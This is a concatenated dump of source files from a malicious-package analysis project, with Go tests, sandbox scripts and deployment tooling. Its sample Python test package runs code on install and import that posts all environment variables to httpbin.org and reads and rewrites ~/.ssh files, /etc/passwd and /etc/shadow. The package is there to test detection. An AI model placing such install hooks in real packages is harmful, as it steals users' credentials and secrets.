*testing.T) { 44 | tests := []struct { 45 | name string 46 | input []byte 47 | want pkgecosystem.Ecosystem 48 | wantErr bool 49 | }{ 50 | { 51 | name: "npm", 52 | input: []byte("npm"), 53 | want: pkgecosystem.NPM, 54 | }, 55 | { 56 | name: "crates.io", 57 | input: []byte("crates.io"), 58 | want: pkgecosystem.CratesIO, 59 | }, 60 | { 61 | name: "unsupported", 62 | input: []byte("this is a test"), 63 | wantErr: true, 64 | }, 65 | { 66 | name: "empty", 67 | input: []byte{}, 68 | want: pkgecosystem.None, 69 | }, 70 | } 71 | for _, test := range tests { 72 | t.Run(test.name, func(t *testing.T) { 73 | var got pkgecosystem.Ecosystem 74 | err := got.UnmarshalText(test.input) 75 | if test.wantErr && err == nil { 76 | t.Fatal("UnmarshalText() is nil; want error") 77 | } 78 | if !test.wantErr && err != nil { 79 | t.Fatalf("UnmarshalText() = %v; want nil", err) 80 | } 81 | if got != test.want { 82 | t.Errorf("UnmarshalText() parsed %v; want %v", got, test.want) 83 | } 84 | }) 85 | } 86 | } 87 | 88 | func TestEcosystemString(t *testing.T) { 89 | tests := []struct { 90 | name string 91 | eco pkgecosystem.Ecosystem 92 | want string 93 | }{ 94 | { 95 | name: "npm", 96 | eco: pkgecosystem.NPM, 97 | want: "npm", 98 | }, 99 | { 100 | name: "unsupported", 101 | eco: pkgecosystem.Ecosystem("this is a test"), 102 | want: "this is a test", 103 | }, 104 | { 105 | name: "empty", 106 | eco: pkgecosystem.Ecosystem(""), 107 | want: "", 108 | }, 109 | } 110 | for _, test := range tests { 111 | t.Run(test.name, func(t *testing.T) { 112 | got := test.eco.String() 113 | if got != test.want { 114 | t.Errorf("String() = %v; want %v", got, test.want) 115 | } 116 | }) 117 | } 118 | } 119 | 120 | func TestEcosystemsAsStrings(t *testing.T) { 121 | want := []string{"npm", "pypi", "rubygems"} 122 | got := pkgecosystem.EcosystemsAsStrings([]pkgecosystem.Ecosystem{ 123 | pkgecosystem.NPM, 124 | pkgecosystem.PyPI, 125 | pkgecosystem.RubyGems, 126 | }) 127 | if !slices.Equal(got, want) { 128 | t.Errorf("EcosystemsAsStrings() = %v; want %v", got, want) 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /pkg/api/staticanalysis/signals.go: -------------------------------------------------------------------------------- 1 | package staticanalysis 2 | 3 | // EscapedString holds a string literal that contains a lot of character escaping. 4 | // This may indicate obfuscation. 5 | type EscapedString struct { 6 | Value string `json:"value"` 7 | Raw string `json:"raw"` 8 | LevenshteinDist int `json:"levenshtein_dist"` 9 | } 10 | 11 | // SuspiciousIdentifier is an identifier that matches a specific rule intended 12 | // to pick out (potentially) suspicious names. Name stores the actual identifier, 13 | // and Rule holds the rule that the identifier matched against. 14 | type SuspiciousIdentifier struct { 15 | Name string `json:"name"` 16 | Rule string `json:"rule"` 17 | } 18 | -------------------------------------------------------------------------------- /pkg/api/staticanalysis/token/identifier_type.go: -------------------------------------------------------------------------------- 1 | package token 2 | 3 | import ( 4 | "encoding/json" 5 | 6 | "golang.org/x/exp/maps" 7 | ) 8 | 9 | // IdentifierType enumerates the possible types of a source code identifier, 10 | // encountered during static analysis. 11 | type IdentifierType int 12 | 13 | const ( 14 | Unknown IdentifierType = iota 15 | Function // function declaration / definition 16 | Variable // variable declaration / definition 17 | Parameter // parameters to functions, constructors, catch blocks 18 | Class // class declaration / definition 19 | Member // access/mutation of an object member 20 | Property // declaration of class property 21 | StatementLabel // loop label 22 | Other // something the parser picked up that isn't accounted for above 23 | ) 24 | 25 | var stringValues = map[IdentifierType]string{ 26 | Unknown: "Unknown", 27 | Function: "Function", 28 | Variable: "Variable", 29 | Parameter: "Parameter", 30 | Class: "Class", 31 | Member: "Member", 32 | Property: "Property", 33 | StatementLabel: "StatementLabel", 34 | Other: "Other", 35 | } 36 | 37 | func (t IdentifierType) String() string { 38 | return stringValues[t] 39 | } 40 | 41 | // MarshalJSON serializes this IdentifierType using its string representation 42 | func (t IdentifierType) MarshalJSON() ([]byte, error) { 43 | return json.Marshal(t.String()) 44 | } 45 | 46 | // UnmarshalJSON deserializes an IdentifierType serialized using MarshalJSON. 47 | // If the supplied JSON contains an unrecognised name, the deserialised value is 48 | // Unknown, and no error is returned. 49 | func (t *IdentifierType) UnmarshalJSON(data []byte) error { 50 | var name string 51 | if err := json.Unmarshal(data, &name); err != nil { 52 | return err 53 | } 54 | 55 | *t = ParseIdentifierType(name) 56 | return nil 57 | } 58 | 59 | func IdentifierTypes() []IdentifierType { 60 | return maps.Keys(stringValues) 61 | } 62 | 63 | func ParseIdentifierType(s string) IdentifierType { 64 | for name, stringVal := range stringValues { 65 | if s == stringVal { 66 | return name 67 | } 68 | } 69 | return Unknown 70 | } 71 | -------------------------------------------------------------------------------- /pkg/api/staticanalysis/token/position.go: -------------------------------------------------------------------------------- 1 | package token 2 | 3 | // Position records the position of a source code token 4 | // in terms of row and column in the original source file. 5 | type Position [2]int 6 | 7 | func (pos Position) Row() int { 8 | return pos[0] 9 | } 10 | 11 | func (pos Position) Col() int { 12 | return pos[1] 13 | } 14 | -------------------------------------------------------------------------------- /pkg/api/staticanalysis/token/tokens.go: -------------------------------------------------------------------------------- 1 | package token 2 | 3 | import ( 4 | "github.com/texttheater/golang-levenshtein/levenshtein" 5 | 6 | "github.com/ossf/package-analysis/internal/staticanalysis/signals/stringentropy" 7 | ) 8 | 9 | // Identifier records some kind of user-defined symbol name in source code. 10 | // Valid types of identifier are defined using IdentifierType. 11 | type Identifier struct { 12 | Name string `json:"name"` 13 | Type IdentifierType `json:"type"` 14 | Entropy float64 `json:"entropy"` 15 | } 16 | 17 | // ComputeEntropy computes the entropy of this identifier's name under the given 18 | // character distribution, and sets its Entropy field to the resulting value. 19 | func (i *Identifier) ComputeEntropy(probs map[rune]float64) { 20 | i.Entropy = stringentropy.Calculate(i.Name, probs) 21 | } 22 | 23 | // String records a string literal occurring in the source code. 24 | type String struct { 25 | Value string `json:"value"` 26 | Raw string `json:"raw"` 27 | Entropy float64 `json:"entropy"` 28 | } 29 | 30 | // ComputeEntropy computes the entropy of this string literal's value under the 31 | // given character distribution, and sets its Entropy field to the resulting value. 32 | func (s *String) ComputeEntropy(probs map[rune]float64) { 33 | s.Entropy = stringentropy.Calculate(s.Value, probs) 34 | } 35 | 36 | // LevenshteinDist computes the Levenshtein distance between the parsed and raw versions of 37 | // this string literal. A character substitution is treated as deletion and insertion (2 operations). 38 | func (s *String) LevenshteinDist() int { 39 | return levenshtein.DistanceForStrings([]rune(s.Raw), []rune(s.Value), levenshtein.DefaultOptions) 40 | } 41 | 42 | // Int records an integer literal occurring in source code. For languages without explicit 43 | // integer types such as JavaScript, an Int literal is any numeric literal whose raw string 44 | // representation in source code is parseable (with strconv.ParseInt) as an integer. 45 | type Int struct { 46 | Value int64 `json:"value"` 47 | Raw string `json:"raw"` 48 | } 49 | 50 | // Float records a floating point literal occurring in source code. 51 | type Float struct { 52 | Value float64 `json:"value"` 53 | Raw string `json:"raw"` 54 | } 55 | 56 | // Comment records the entire text of a source code comment. 57 | // It may contain newline characters. 58 | type Comment struct { 59 | Text string `json:"text"` 60 | } 61 | -------------------------------------------------------------------------------- /sample_packages/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build_sample_python_package 2 | 3 | IMAGE_NAME = sample-python-package-image 4 | CONTAINER_NAME = sample-python-package-container 5 | 6 | build_sample_python_package: 7 | docker build -t ${IMAGE_NAME} sample_python_package/ 8 | docker run --name ${CONTAINER_NAME} -d ${IMAGE_NAME} 9 | docker cp ${CONTAINER_NAME}:/sample_python_package/dist/. sample_python_package/output 10 | docker stop ${CONTAINER_NAME} 11 | docker rm ${CONTAINER_NAME} 12 | docker image rm ${IMAGE_NAME} 13 | -------------------------------------------------------------------------------- /sample_packages/README.md: -------------------------------------------------------------------------------- 1 | ## Sample packages 2 | 3 | Packages in this directory will simulate different types of malicious behavior for testing purposes. These packages should attempt to revert any modifications made, but it is not recommended to install, import, or use these packages in nonisolated settings. 4 | 5 | The same license for the rest of the package analysis project applies to any package in this directory. 6 | 7 | ### Sample python package 8 | Build the package by running`make build_sample_python_package` in this directory. The .tar.gz file that can be used for local analysis will be added to the directory `sample_python_package/output` 9 | 10 | Developers can modify which behaviors they want to simulate. (Collection of functionalities listed above main function in example.py) Note, however, that at this time output logging may not be comprehensive. 11 | 12 | 13 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9@sha256:edee3d665aba1d84f5344eca825d0de34b38dbf77a776cafd9df65c67e240866 2 | 3 | WORKDIR /sample_python_package 4 | 5 | COPY . /sample_python_package 6 | 7 | RUN pip install --upgrade build 8 | 9 | RUN python3 -m build 10 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = ["setuptools"] 3 | build-backend = "setuptools.build_meta" 4 | 5 | [project] 6 | name = "sample_python_package" 7 | version = "0.0.1" 8 | authors = [ 9 | { name="OpenSSF " }, 10 | ] 11 | description = "A small example package" 12 | readme = "README.md" 13 | requires-python = ">=3.7" 14 | classifiers = [ 15 | "Programming Language :: Python :: 3", 16 | "License :: OSI Approved :: Apache Software License", 17 | "Operating System :: OS Independent", 18 | ] 19 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/setup.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) 4 | sys.path.append(SCRIPT_DIR) 5 | 6 | from setuptools import setup, find_packages 7 | from src.example import * 8 | 9 | setup(name="sample_python_package", 10 | packages=find_packages(),) 11 | 12 | [f("setup.py", True) for f in https_functions + access_credentials_functions] 13 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/src/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) 4 | sys.path.append(SCRIPT_DIR) 5 | 6 | from example import * 7 | 8 | [f("__init__.py", True) for f in https_functions + access_credentials_functions] 9 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/src/example.py: -------------------------------------------------------------------------------- 1 | import http.client 2 | import json 3 | import os 4 | 5 | # Sends an HTTPS post request and prints out the response. 6 | # Exfiltrates environment variables. 7 | def send_https_post_request(called_from: str, print_logs: bool) -> None: 8 | host = "www.httpbin.org" 9 | conn = http.client.HTTPSConnection(host) 10 | data = {"text": f"Sending data through HTTPS from: {called_from}. Found environment variables: {str(os.environ)}"} 11 | json_data = json.dumps(data) 12 | conn.request("POST", "/post", json_data, headers={"Host": host}) 13 | response = conn.getresponse() 14 | if print_logs: 15 | print(response.read().decode()) 16 | 17 | 18 | # Access ssh keys and attempts to read and write to them. 19 | def access_ssh_keys(called_from: str, print_logs: bool) -> None: 20 | ssh_keys_directory_path = os.path.join(os.path.expanduser('~'), ".ssh") 21 | if os.path.isdir(ssh_keys_directory_path): 22 | try: 23 | files_in_ssh_keys_directory = os.listdir(ssh_keys_directory_path) 24 | for file_name in files_in_ssh_keys_directory: 25 | full_file_path = os.path.join(ssh_keys_directory_path, file_name) 26 | original_file_data = "" 27 | with open(full_file_path, "r") as f: 28 | original_file_data += f.read() 29 | with open(full_file_path, "a") as f: 30 | f.write("\nWriting to files in ~/.ssh from: " + called_from) 31 | # Reset the original state of the files. 32 | with open(full_file_path, "w") as f: 33 | f.write(original_file_data) 34 | if print_logs: 35 | print("Files in ssh keys directory", files_in_ssh_keys_directory) 36 | except Exception as e: 37 | # Fail gracefully to allow execution to continue. 38 | if print_logs: 39 | print(f"An exception occurred when calling access_ssh_keys: {str(e)}") 40 | elif print_logs: 41 | print("Could not locate ssh key directory.") 42 | 43 | def read_file_and_log(file_to_read: str, called_from: str, print_logs: bool) -> None: 44 | if os.path.isfile(file_to_read): 45 | try: 46 | with open(file_to_read, "r") as f: 47 | file_lines = f.readlines() 48 | if print_logs: 49 | print("Read " + file_to_read + " from: " + called_from + ". Lines: " + str(len(file_lines))) 50 | except Exception as e: 51 | # Fail gracefully to allow execution to continue. 52 | if print_logs: 53 | print(f"An exception occurred when calling read_file_and_log: {str(e)}") 54 | 55 | def access_passwords(called_from: str, print_logs: bool) -> None: 56 | password_file = os.path.join(os.path.abspath(os.sep), "etc", "passwd") 57 | shadow_password_file = os.path.join(os.path.abspath(os.sep), "etc", "shadow") 58 | read_file_and_log(password_file, called_from, print_logs) 59 | # Requires root to read. 60 | read_file_and_log(shadow_password_file, called_from, print_logs) 61 | 62 | # Collection of functionalities to run that can be customized. 63 | https_functions = [send_https_post_request] 64 | access_credentials_functions = [access_ssh_keys, access_passwords] 65 | 66 | def main(): 67 | [f("main function", True) for f in https_functions + access_credentials_functions] 68 | 69 | if __name__ == "__main__": 70 | main() 71 | -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/analyze-ruby.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # 3 | require 'find' 4 | require 'open3' 5 | require 'pathname' 6 | 7 | class Package 8 | attr_reader :name, :version, :local_file 9 | 10 | def initialize(name:, version:, local_file:) 11 | @name, @version, @local_file = name, version, local_file 12 | end 13 | end 14 | 15 | def install(package) 16 | cmd = ["gem", "install"] 17 | if package.local_file 18 | cmd << package.local_file 19 | else 20 | if package.version 21 | cmd << "-v" 22 | cmd << package.version 23 | end 24 | cmd << package.name 25 | end 26 | 27 | output, status = Open3.capture2e(*cmd) 28 | puts output 29 | 30 | if status.success? 31 | puts "Install succeeded." 32 | return 33 | end 34 | 35 | # Always exit on failure. 36 | # Install failing is either an interesting issue, or an opportunity to 37 | # improve the analysis. 38 | puts "Install failed." 39 | exit 1 40 | end 41 | 42 | def importPkg(package) 43 | spec = Gem::Specification.find_by_name(package.name) 44 | 45 | spec.require_paths.each do |require_path| 46 | if Pathname.new(require_path).absolute? 47 | lib_path = Pathname.new(require_path) 48 | else 49 | lib_path = Pathname.new(File.join(spec.full_gem_path, require_path)) 50 | end 51 | 52 | Find.find(lib_path.to_s) do |path| 53 | if path.end_with?('.rb') 54 | relative_path = Pathname.new(path).relative_path_from(lib_path) 55 | 56 | require_path = relative_path.to_s.delete_suffix('.rb') 57 | puts "Loading #{require_path}" 58 | begin 59 | require require_path 60 | rescue Exception => e 61 | puts "Failed to load #{require_path}: #{e}" 62 | end 63 | end 64 | end 65 | end 66 | end 67 | 68 | phases = { 69 | "all" => [method(:install), method(:importPkg)], 70 | "install" => [method(:install)], 71 | "import" => [method(:importPkg)], 72 | } 73 | 74 | if ARGV.length < 2 || ARGV.length > 4 75 | puts "Usage: #{$0} [--local file | --version version] phase package" 76 | exit 1 77 | end 78 | 79 | local_file = nil 80 | version = nil 81 | 82 | # Parse the arguments manually to avoid introducing unnecessary dependencies 83 | # and side effects that add noise to the strace output. 84 | case ARGV[0] 85 | when "--local" 86 | ARGV.shift 87 | local_file = ARGV.shift 88 | when "--version" 89 | ARGV.shift 90 | version = ARGV.shift 91 | end 92 | 93 | phase = ARGV.shift 94 | package_name = ARGV.shift 95 | 96 | package = Package.new(name: package_name, version: version, local_file: local_file) 97 | 98 | if !phases.has_key?(phase) 99 | puts "Unknown phase #{phase} specified" 100 | exit 1 101 | end 102 | 103 | phases[phase].each { |m| m.call(package) } 104 | -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/analyze-rust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from dataclasses import dataclass 3 | import os 4 | import sys 5 | import subprocess 6 | import traceback 7 | from typing import Optional 8 | 9 | @dataclass 10 | class Package: 11 | """Class for tracking a package.""" 12 | name: str 13 | version: Optional[str] = None 14 | local_path: Optional[str] = None 15 | 16 | def get_dependency_line(self): 17 | if self.local_path: 18 | return f'{self.name} = {{ path = "{self.local_path}" }}' 19 | elif self.version: 20 | return f'{self.name} = "{self.version}"' 21 | else: 22 | return f'{self.name} = "*"' 23 | 24 | def install(package: Package): 25 | """Cargo build.""" 26 | try: 27 | with open("Cargo.toml", 'a') as handle: 28 | handle.write(package.get_dependency_line() + '\n') 29 | handle.flush() 30 | 31 | output = subprocess.check_output(['cargo', 'build'], stderr=subprocess.STDOUT) 32 | 33 | print('Install succeeded:') 34 | print(output.decode()) 35 | except subprocess.CalledProcessError as e: 36 | print('Failed to install:') 37 | print(e.output.decode()) 38 | # Always raise. 39 | # Install failing is either an interesting issue, or an opportunity to 40 | # improve the analysis. 41 | raise 42 | 43 | def importPkg(package: Package): 44 | path_to_rs = os.path.join(os.getcwd(), 'src', 'main.rs') 45 | try: 46 | with open(path_to_rs, 'r+') as handle: 47 | content = handle.read() 48 | handle.seek(0, 0) 49 | handle.write('#[allow(unused_imports)]\n') 50 | handle.write(f'use {package.name.strip()}::*;' + '\n' + content) 51 | handle.flush() 52 | subprocess.check_output(['cargo', 'run'], stderr=subprocess.STDOUT) 53 | except subprocess.CalledProcessError as e: 54 | print('Failed to import:') 55 | print(e.output.decode()) 56 | traceback.print_exc() 57 | 58 | PHASES = { 59 | "all": [install, importPkg], 60 | "install": [install], 61 | "import": [importPkg], 62 | } 63 | 64 | def main(): 65 | args = list(sys.argv) 66 | script = args.pop(0) 67 | 68 | if len(args) < 2 or len(args) > 4: 69 | raise ValueError(f'Usage: {script} [--local file | --version version] phase package_name') 70 | 71 | # Parse the arguments manually to avoid introducing unnecessary dependencies 72 | # and side effects that add noise to the strace output. 73 | local_path = None 74 | version = None 75 | if args[0] == '--local': 76 | args.pop(0) 77 | local_path = args.pop(0) 78 | elif args[0] == '--version': 79 | args.pop(0) 80 | version = args.pop(0) 81 | 82 | phase = args.pop(0) 83 | package_name = args.pop(0) 84 | 85 | if not phase in PHASES: 86 | print(f'Unknown phase {phase} specified.') 87 | exit(1) 88 | 89 | package = Package(name=package_name, version=version, local_path=local_path) 90 | 91 | # Execute for the specified phase. 92 | for phase in PHASES[phase]: 93 | phase(package) 94 | 95 | 96 | if __name__ == '__main__': 97 | main() 98 | -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/bowerrc: -------------------------------------------------------------------------------- 1 | { "allow-root": true } -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/pypi-packages.txt: -------------------------------------------------------------------------------- 1 | # These Python packages are installed in the sandbox prior to the package under analysis 2 | # They are meant to simulate packages commonly installed on a typical system. 3 | # Hashes are used to pin dependency artifacts (https://pip.pypa.io/en/stable/topics/secure-installs/) 4 | 5 | # The hashes below are for the binary distributions 6 | 7 | certifi==2022.12.7 \ 8 | --hash=sha256:4ad3232f5e926d6718ec31cfc1fcadfde020920e278684144551c91769c7bc18 9 | charset-normalizer==2.1.1 \ 10 | --hash=sha256:83e9a75d1911279afd89352c68b45348559d1fc0506b054b346651b5e7fee29f 11 | idna==3.4 \ 12 | --hash=sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2 13 | requests==2.28.1 \ 14 | --hash=sha256:8fefa2a1a1365bf5520aac41836fbee479da67864514bdb821f31ce07ce65349 15 | urllib3==1.26.14 \ 16 | --hash=sha256:75edcdc2f7d85b137124a6c3c9fc3933cdeaa12ecb9a6a959f22797a0feca7e1 17 | -------------------------------------------------------------------------------- /sandboxes/staticanalysis/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | 3 | # Note: Dockerfile uses paths relative to the top-level project directory, 4 | # so it should be built from that directory, i.e: 5 | # $ cd package-analysis 6 | # $ docker build -f sandboxes/staticanalysis/Dockerfile . 7 | 8 | # Cache dependencies to avoid downloading again on code change 9 | WORKDIR /src 10 | # Dependencies for package analysis 11 | COPY ./go.mod ./go.sum ./ 12 | 13 | RUN go mod download 14 | 15 | COPY . ./ 16 | 17 | WORKDIR /src/sandboxes/staticanalysis 18 | # If CGO is disabled then we don't need glibc 19 | RUN CGO_ENABLED=0 go build -o staticanalyze staticanalyze.go 20 | 21 | FROM alpine:3.17.1@sha256:93d5a28ff72d288d69b5997b8ba47396d2cbb62a72b5d87cd3351094b5d578a0 22 | RUN apk add --no-cache file && \ 23 | apk add --no-cache nodejs && \ 24 | apk add --no-cache npm && \ 25 | apk add --no-cache python3 26 | 27 | COPY --from=build /src/sandboxes/staticanalysis/staticanalyze /usr/local/bin/staticanalyze 28 | RUN chmod 755 /usr/local/bin/staticanalyze 29 | 30 | RUN mkdir /npm_deps 31 | COPY --from=build /src/internal/staticanalysis/parsing/package.json /src/internal/staticanalysis/parsing/package-lock.json /npm_deps/ 32 | 33 | # cache NPM installs in /npm_cache so that static analysis binary can use them 34 | RUN mkdir -m 755 /npm_cache && \ 35 | npm ci --prefix /npm_deps --cache /npm_cache 36 | 37 | WORKDIR /app 38 | 39 | ENTRYPOINT [ "sleep" ] 40 | CMD [ "30m" ] 41 | -------------------------------------------------------------------------------- /scripts/analyse-tarballs.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | # Replace with root of package analysis folder 4 | PACKAGE_ANALYSIS_ROOT=~/package-analysis 5 | 6 | # This script runs static analysis on all packages in a directory and 7 | # creates a new directory with all the static analysis results for each package. 8 | # Currently, it only supports NPM packages (as static analysis does). 9 | 10 | RUN_ANALYSIS="$PACKAGE_ANALYSIS_ROOT/scripts/run_analysis.sh" 11 | FORMAT_JSON="$PACKAGE_ANALYSIS_ROOT/scripts/format-static-analysis-json.py" 12 | 13 | if ! [[ -x "$RUN_ANALYSIS" ]]; then 14 | echo "could not locate run_analysis.sh script at $RUN_ANALYSIS" 15 | exit 1 16 | elif ! [[ -x "$FORMAT_JSON" ]]; then 17 | echo "could not locate format-json.py script at $FORMAT_JSON" 18 | exit 1 19 | fi 20 | 21 | ARCHIVES_DIR="$1" 22 | RESULTS_DIR=${2:-"$ARCHIVES_DIR-results"} 23 | START_LETTER="$3" 24 | 25 | if [[ -z "$ARCHIVES_DIR" ]]; then 26 | echo "Archives dir not provided, please specify directory of .tgz archives" 27 | exit 1 28 | fi 29 | 30 | if [[ ! -d "$ARCHIVES_DIR" ]]; then 31 | echo "error: archives dir is not a directory" 32 | exit 1 33 | fi 34 | 35 | 36 | mkdir -p "$RESULTS_DIR" 37 | 38 | function process_archive { 39 | ARCHIVE_PATH="$1" 40 | RESULTS_DIR="$2" 41 | START_LETTER="$3" 42 | if [[ -z "$ARCHIVE_PATH" ]]; then 43 | echo "Archive path is empty" 44 | return 1 45 | elif [[ -z "$RESULTS_DIR" ]]; then 46 | echo "Results dir is empty" 47 | return 1 48 | fi 49 | 50 | PACKAGE_VERSION_EXT=${ARCHIVE_PATH##"$ARCHIVES_DIR/"} 51 | PACKAGE_VERSION=${PACKAGE_VERSION_EXT%%.tgz} 52 | PACKAGE_FIRST_LETTER=${PACKAGE_VERSION:0:1} 53 | if [[ "$PACKAGE_FIRST_LETTER" < "$START_LETTER" ]]; then 54 | echo SKIP "$PACKAGE_VERSION" 55 | return 56 | fi 57 | # package name is everything before the last '-' character 58 | # package version is everything between the last '-' character and .tgz 59 | PACKAGE=$(python3 -c "print('-'.join(\"$PACKAGE_VERSION\".split('-')[:-1]))") 60 | VERSION=$(python3 -c "print(\"$PACKAGE_VERSION\".split('-')[-1])") 61 | echo "Package: $PACKAGE" 62 | echo "Version: $VERSION" 63 | 64 | OUTPUT_RESULTS_DIR=$(mktemp -d) 65 | 66 | # Notes on options: 67 | # 1. To run local sandbox images, add -nopull 68 | # 2. If running static analysis only from local images (i.e. -nopull), network access is not required. 69 | # In this case, the -offline -fully-offline options can be added to disable network access totally. 70 | RESULTS_DIR="$OUTPUT_RESULTS_DIR/dynamic" STATIC_RESULTS_DIR="$OUTPUT_RESULTS_DIR/static" "$RUN_ANALYSIS" \ 71 | -ecosystem npm -package "$PACKAGE" -local "$ARCHIVE_PATH" -nointeractive 72 | 73 | # pretty print while keeping some of the small JSON structs on a single line 74 | "$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/dynamic/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-dynamic.json" 75 | "$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/static/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-static.json" 76 | 77 | rm -rf "$OUTPUT_RESULTS_DIR" 78 | } 79 | 80 | for ARCHIVE_PATH in "$ARCHIVES_DIR"/*.tgz "$ARCHIVES_DIR"/*.tar.gz; do 81 | process_archive "$ARCHIVE_PATH" "$RESULTS_DIR" "$START_LETTER" 82 | done 83 | -------------------------------------------------------------------------------- /scripts/deploy.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | if [[ -z ${GIT_TAG} ]]; then 4 | echo "Missing git tag" 5 | exit 1 6 | fi 7 | 8 | echo "git checkout ${GIT_TAG}" 9 | git checkout "${GIT_TAG}" 10 | 11 | if ! git diff-index --quiet HEAD; then 12 | echo "there are uncommitted changes, please ensure the repo is clean" 13 | exit 1 14 | fi 15 | 16 | gcloud container clusters get-credentials analysis-cluster --zone=us-central1-c --project=ossf-malware-analysis 17 | 18 | pushd infra/worker || (echo "pushd infra/worker failed" && exit 1) 19 | 20 | echo "Were any changes made to the k8s config?" 21 | echo "Enter y to apply config changes and then restart workers, n to just restart, ctrl-C to exit" 22 | read -r yn 23 | case $yn in 24 | [Yy]* ) 25 | echo "kubectl apply -f $(pwd)" 26 | kubectl apply -f . 27 | ;; 28 | [Nn]* ) 29 | echo "kubectl rollout restart deployment workers-deployment" 30 | kubectl rollout restart statefulset workers-deployment 31 | ;; 32 | esac 33 | 34 | 35 | popd || (echo "failed to popd" && exit 1) 36 | -------------------------------------------------------------------------------- /scripts/format-static-analysis-json.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ 4 | Custom tool to pretty-print JSON with certain fields compacted 5 | 6 | Adapted from source of `python -m json.tool` 7 | reference: github.com/python/cpython/blob/main/Lib/json/tool.py 8 | """ 9 | 10 | import json 11 | import re 12 | import sys 13 | 14 | 15 | # Changes JSON structs that are formatted like: 16 | # { 17 | # "key1": ... 18 | # } 19 | # into ones like 20 | # { "key1": ... } 21 | struct_single_key_substitution = ( 22 | re.compile('{$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE), 23 | '{ "\\1": \\2 }' 24 | ) 25 | 26 | # Changes JSON structs that are formatted like: 27 | # { 28 | # "key1": ..., 29 | # "key2": ... 30 | # } 31 | # into ones like 32 | # { "key1": ..., "key2": ... } 33 | struct_pair_substitution = ( 34 | re.compile('{$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE), 35 | '{ "\\1": \\2, "\\3": \\4 }' 36 | ) 37 | 38 | # Changes JSON structs that are formatted like: 39 | # { 40 | # "key1": ..., 41 | # "key2": ..., 42 | # "key3": ... 43 | # } 44 | # into ones like 45 | # { "key1": ..., "key2": ..., "key3": ... } 46 | struct_triple_substitution = ( 47 | re.compile('{$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE), 48 | '{ "\\1": \\2, "\\3": \\4, "\\5": \\6 }' 49 | ) 50 | 51 | all_substitutions = (struct_single_key_substitution, struct_pair_substitution, struct_triple_substitution) 52 | 53 | 54 | # Pretty prints a JSON object with newlines and indentation, then applies 55 | # the substitutions above while maintaining indentation level. 56 | def format_json(json_object) -> str: 57 | # pretty print with newlines and indent with 4 spaces, 58 | pretty_printed = json.dumps(json_object, indent=4) 59 | 60 | # apply all replacements in sequence 61 | for (pattern, replacement) in all_substitutions: 62 | pretty_printed = re.sub(pattern, replacement, pretty_printed) 63 | 64 | return pretty_printed 65 | 66 | 67 | def main(args: list[str]): 68 | if "--help" in args: 69 | print(f"Usage: {args[0]} [ []]") 70 | return 71 | 72 | input_path = args[1] if len(args) >= 2 else None 73 | output_path = args[2] if len(args) >= 3 else None 74 | 75 | if input_path: 76 | with open(input_path) as infile: 77 | json_object = json.load(infile) 78 | else: 79 | json_object = json.load(sys.stdin) 80 | 81 | custom_formatted_json = format_json(json_object) 82 | 83 | if output_path: 84 | with open(output_path, "w", encoding="utf-8") as outfile: 85 | outfile.write(custom_formatted_json) 86 | outfile.write("\n") 87 | else: 88 | print(custom_formatted_json) 89 | 90 | 91 | if __name__ == '__main__': 92 | try: 93 | main(sys.argv) 94 | except BrokenPipeError as exc: 95 | sys.exit(exc.errno) 96 | except ValueError as e: 97 | raise SystemExit(e) 98 | 99 | -------------------------------------------------------------------------------- /test/e2e/README.md: -------------------------------------------------------------------------------- 1 | # End to End Testing with Package-Feeds integration 2 | 3 | This directory helps run end-to-end tests of the package analysis system 4 | to ensure everything is working properly. 5 | In particular, local changes to both the worker/analysis and sandbox images can be tested 6 | before they are pushed to the docker registry. 7 | 8 | The test is orchestrated using docker-compose, using an adapted setup based on the one in 9 | `configs/e2e`. All the necessary commands can be run via the project Makefile. 10 | 11 | ## Running 12 | 13 | ### Starting the test 14 | 15 | In the top-level project directory, run 16 | 17 | ```shell 18 | $ make RELEASE_TAG=test build_prod_images sync_prod_sandboxes # rebuild images with 'test' tag 19 | $ make e2e_test_start 20 | 21 | ``` 22 | 23 | ### Stopping the test 24 | 25 | In the top-level project directory, run 26 | 27 | ```shell 28 | $ make e2e_test_stop 29 | ``` 30 | 31 | ## Analysis Output 32 | 33 | Output can be found at http://localhost:9000/minio/package-analysis, 34 | using the following credentials for authentication: 35 | 36 | - username: `minio` 37 | - password: `minio123` 38 | 39 | ## Logs Access 40 | 41 | In the top-level project directory, run 42 | 43 | `make e2e_test_logs_feeds` to see information on the packages which have been send downstream. 44 | 45 | `make 